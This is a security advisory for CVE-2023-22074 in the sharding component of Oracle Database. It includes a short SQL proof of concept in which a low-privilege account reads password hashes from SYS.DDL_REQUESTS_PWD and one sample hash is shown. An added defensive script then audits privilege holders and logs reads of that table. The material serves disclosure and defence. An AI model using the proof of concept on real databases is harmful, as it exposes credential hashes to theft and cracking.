| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2023-22074 | 25 Oct 2023 15:31 | – | circl |
| Oracle Database Server Security Vulnerability | 17 Oct 2023 00:00 | – | cnnvd |
| CVE-2023-22074 | 17 Oct 2023 21:02 | – | cve |
| CVE-2023-22074 | 17 Oct 2023 21:02 | – | cvelist |
| EUVD-2023-26239 | 3 Oct 2025 20:07 | – | euvd |
| Vulnerabilities fixed in Oracle Database Server | 19 Oct 2023 00:00 | – | ncsc |
| CVE-2023-22074 | 17 Oct 2023 22:15 | – | nvd |
| Oracle Critical Patch Update Advisory - October 2023 | 17 Oct 2023 00:00 | – | oracle |
| Oracle Database Server (October 2023 CPU) | 20 Oct 2023 00:00 | – | nessus |
| Buffer overflow | 17 Oct 2023 22:15 | – | prion |
Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c, 21c (19.3-19.20 and 21.3-21.11)
Tested Version(s): 19c
Risk Level: Low
Solution Status: Fixed
CVE Reference: CVE-2023-22074
Base Score: 2.4
Author of Advisory: Emad Al-Mousa
*****************************************
Vulnerability Details:
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. An attacker who compromises an account holding the CREATE SESSION and SELECT ANY DICTIONARY privileges can read password hashes from SYS.DDL_REQUESTS_PWD, a system table created as part of the sharding component setup.
*****************************************
Proof of Concept (PoC):
I will create an account called "jim" in pluggable database ORCLPDB1 and grant the account the CREATE SESSION and SELECT ANY DICTIONARY privileges:
SQL> alter session set container=ORCLPDB1;
Session altered.
SQL> create user jim identified by jim123;
User created.
SQL> grant create session,select any dictionary to jim;
Grant succeeded.
I will now connect as database account "jim"; the account is able to read the password hashes in the system table SYS.DDL_REQUESTS_PWD used by the database sharding component:
sqlplus "jim/jim123"@ORCLPDB1
SQL> show user
USER is "JIM"
SQL> select * from SYS.DDL_REQUESTS_PWD;
   DDL_NUM  PWD_BEGIN  ENC_PWD
---------- ---------- --------------------------------------------------------------------------------
       123        445  E494684108560FFEF1C17CDE72F36A1A
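The PoC shows the two preconditions an attacker needs: a session and the SELECT ANY DICTIONARY system privilege. The following script is an added example and is not part of the advisory or of Oracle's own tooling; it enumerates every account that ends up with that privilege (directly or through any chain of roles), confirms the exposed table is present, and turns on unified privilege auditing so a read of SYS.DDL_REQUESTS_PWD by the same route leaves a trail. It assumes it is run as a DBA inside the affected pluggable database (ORCLPDB1 in the advisory) with unified auditing enabled; the policy name sharding_pwd_read_policy is a hypothetical choice.

```sql
-- Added example (not from the advisory or from Oracle). Assumes a DBA session
-- in the affected PDB and unified auditing; the policy name is hypothetical.

-- 1. Who holds SELECT ANY DICTIONARY, directly or through any chain of roles?
--    Oracle refuses circular role grants, so the recursion terminates.
WITH role_tree (holder, granted_role) AS (
  SELECT grantee, granted_role
    FROM dba_role_privs
  UNION ALL
  SELECT rt.holder, rp.granted_role
    FROM role_tree rt
    JOIN dba_role_privs rp ON rp.grantee = rt.granted_role
)
SELECT u.username, u.account_status, 'DIRECT GRANT' AS granted_via
  FROM dba_sys_privs sp
  JOIN dba_users u ON u.username = sp.grantee
 WHERE sp.privilege = 'SELECT ANY DICTIONARY'
UNION
SELECT u.username, u.account_status, 'ROLE ' || sp.grantee
  FROM dba_sys_privs sp
  JOIN role_tree rt ON rt.granted_role = sp.grantee
  JOIN dba_users u ON u.username = rt.holder
 WHERE sp.privilege = 'SELECT ANY DICTIONARY'
 ORDER BY 1, 3;

-- 2. Confirm the exposed table is present in this PDB.
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE owner = 'SYS' AND object_name = 'DDL_REQUESTS_PWD';

-- 3. Record every statement that exercises SELECT ANY DICTIONARY. Privilege
--    auditing is used rather than object auditing on the SYS-owned table, so
--    the policy also catches reads of other dictionary tables by the same route.
CREATE AUDIT POLICY sharding_pwd_read_policy
  PRIVILEGES SELECT ANY DICTIONARY;
AUDIT POLICY sharding_pwd_read_policy;

-- 4. After repeating the advisory's test (connect as JIM, select from the
--    table), the read shows up here together with the privilege that allowed it.
SELECT event_timestamp, dbusername, action_name, object_schema, object_name,
       system_privilege_used, sql_text
  FROM unified_audit_trail
 WHERE object_name = 'DDL_REQUESTS_PWD'
 ORDER BY event_timestamp;
```

The first query is the one to run before and after applying the October 2023 CPU: the patch removes the exposure, but every account it lists can still read the rest of the data dictionary, so any grantee that is not a DBA or a monitoring account is worth revoking regardless.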
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074